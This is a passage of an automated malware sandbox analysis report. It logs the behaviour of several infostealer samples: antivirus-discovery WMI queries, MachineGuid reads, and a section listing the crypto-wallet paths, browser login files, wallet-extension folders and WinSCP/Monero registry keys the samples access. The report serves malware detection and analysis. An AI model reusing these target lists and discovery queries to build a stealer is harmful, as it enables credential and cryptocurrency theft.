Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 12_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free, 12_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 12_2_00437F83
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 16_2_028B0AB6
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 16_2_0289C8B7
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 16_2_028A49EA
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 16_2_028A394D
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 16_2_028A3F87
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 17_2_0043404A
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 17_2_00438178
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 17_2_00440116
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 17_2_004382A2
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 17_2_0043834F
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 17_2_00438423
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 17_2_004335E7
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: EnumSystemLocalesW, 17_2_004387C8
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: GetLocaleInfoW, 17_2_0043884E
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 17_2_00432B6D
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW, 17_2_00437BB3
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: EnumSystemLocalesW, 17_2_00437E27
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 17_2_00437E83
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 17_2_00437F00
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free, 17_2_0042BF17
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 17_2_00437F83
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 17_2_00432FAD
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_00408E0C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 11_2_00408E0C
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 12_2_0042FE47
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 12_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: explorer.exe, 00000022.00000002.4542597682.000000000952E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4414268907.000000000952E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rogramFiles%\Windows Defender\MsMpeng.exe
Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3074902225.0000000001509000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3075117342.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3113069139.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125433405.0000000001504000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: amFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\A0B.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\71C9.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A0B.exe PID: 5352, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 35.2.build2.exe.21d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.build2.exe.21d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: build2.exe PID: 5968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build2.exe PID: 728, type: MEMORYSTR
Source: A0B.exe, 00000017.00000002.3122756378.0000000001138000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: A0B.exe, 00000017.00000002.3122756378.0000000001138000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
Source: A0B.exe, 00000017.00000003.3011665657.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
Source: A0B.exe, 00000017.00000003.3011665657.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Edge/Default/Extensions/ExodusWeb3
Source: A0B.exe, 00000017.00000003.3011665657.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "p": "%appdata%\\Ethereum",
Source: A0B.exe, 00000017.00000002.3124595355.0000000001474000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: A0B.exe, 00000017.00000003.3011665657.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "keystore"
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
